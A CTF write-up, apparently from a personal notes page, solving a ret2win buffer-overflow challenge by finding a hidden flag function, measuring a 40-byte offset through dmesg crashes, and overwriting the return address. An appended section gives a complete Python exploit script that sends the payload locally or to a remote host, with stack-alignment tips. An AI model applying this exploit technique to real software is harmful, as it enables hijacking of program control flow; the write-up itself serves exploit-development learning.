![bc05f00ecc2353a02fac35b2169924aa.png](e55111680a3849cbb9684b09f6587aa7.png)

Same idea as Pwn intended 0x2, but this time the function we want to return to is not as obvious. Start by analyzing the binary.

![504f53d5778b6ebe7b198aa1d8e5d7ec.png](0f2ac7275d564063a901ecc671cde229.png)
![071fad63a5963f0256d02e9be7a21d24.png](c5f0d916ab624f4a988a6e2f882db574.png)

Nothing interesting in main, but the symbol list shows a `sym.flag` function, so let's check that out.

![8a100fa908be8a2b53e21367ba9350ac.png](38211eb1a26b49e08d52b72b9c954fcb.png)

That's what we want: it prints the flag, so the goal is to overwrite the saved return address with the start of `sym.flag` at 0x004011ce.

Same as 0x2, find the padding using Python and dmesg: send inputs of increasing length and watch dmesg for the first segfault.

![f974eca91c6b6ad05ab065407f95dae5.png](b57aba59443a41ee8f336b731bcfa792.png)
![d57c22f9604986264b23cbacca662370.png](d9b2c81dd4614b6094c7e393c8e12f92.png)

The first crash shows up at 41 bytes, meaning byte 41 is the first one to land on the saved return address, so we'll use 40 bytes of padding followed by 0x004011ce packed as a little-endian 8-byte value.

Script:

![3c71b8e7f3e03b1a80a3cc7a4f06484f.png](1b08c7a7883548cfaa16874cbdc3b5d2.png)
![53dd3ef97673c5dd26944527dda1d0ff.png](f5fc1e2c0cc740abaddce72adf137da2.png)

---
Back to [[_WebSite Publish/CTF/CTF Index|CTF Index]]

Tags: #ctf #exploit_development #buffer_overflow #scripting

Related:
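As an added example (not the script from the screenshots above), here is a standalone Python version of the ret2win payload this writeup builds: 40 bytes of padding followed by the address of `sym.flag` (0x004011ce) in little-endian form, plus the probe payload used with dmesg to find the offset. It uses only the standard library, so it works without pwntools. The binary path, host and port are placeholders you supply on the command line; the check for a newline byte inside the address is a general precaution for line-oriented input readers and is not something the page itself discusses.

```python
#!/usr/bin/env python3
"""Payload builder for the ret2win above: 40 bytes of padding, then the address
of sym.flag (0x004011ce) packed little-endian so it overwrites the saved
return address of the vulnerable function.

Added example, not the original writeup's script. Target paths, host and
port are assumptions passed on the command line."""
import socket
import struct
import subprocess
import sys

FLAG_ADDR = 0x004011CE  # sym.flag, from the disassembly in the writeup
PADDING = 40            # bytes written before the saved return address


def probe_payload(n):
    """n filler bytes. Send increasing n and watch `dmesg` for the first
    segfault: the first crashing length is one past the padding size
    (the page sees the first crash at 41 bytes, hence PADDING = 40)."""
    return b"A" * n


def build_payload(padding=PADDING, target=FLAG_ADDR):
    """Padding followed by the 8-byte little-endian return address.

    The program reads a line, so a 0x0a byte inside the address would cut
    the payload short. Trailing NULs (0x00000000004011ce has five) are fine
    because they come after the meaningful bytes and a line reader does not
    stop on NUL."""
    addr = struct.pack("<Q", target)
    if b"\n" in addr.rstrip(b"\x00"):
        raise ValueError("target address contains a newline byte: %#x" % target)
    return b"A" * padding + addr


def send_local(path, payload):
    """Run the binary locally with the payload on stdin, return its stdout."""
    proc = subprocess.run([path], input=payload + b"\n",
                          capture_output=True, timeout=5)
    return proc.stdout


def send_remote(host, port, payload):
    """Deliver the payload to the challenge service and collect its reply."""
    out = b""
    with socket.create_connection((host, port), timeout=5) as s:
        s.sendall(payload + b"\n")
        while True:
            chunk = s.recv(4096)
            if not chunk:
                break
            out += chunk
    return out


if __name__ == "__main__":
    # usage: exploit.py ./binary          (local)
    #        exploit.py HOST PORT         (remote)
    payload = build_payload()
    if len(sys.argv) == 2:
        sys.stdout.buffer.write(send_local(sys.argv[1], payload))
    elif len(sys.argv) == 3:
        sys.stdout.buffer.write(send_remote(sys.argv[1], int(sys.argv[2]), payload))
    else:
        sys.exit("usage: exploit.py ./binary | exploit.py HOST PORT")
```

If the local run segfaults inside `flag()` rather than printing, the usual x86-64 culprit is a 16-byte stack alignment requirement of a libc call inside it; a common fix is returning to `flag+1` (skipping `push rbp`) or routing through a `ret` gadget first. The writeup's run did not need this, so the default above is the plain function address.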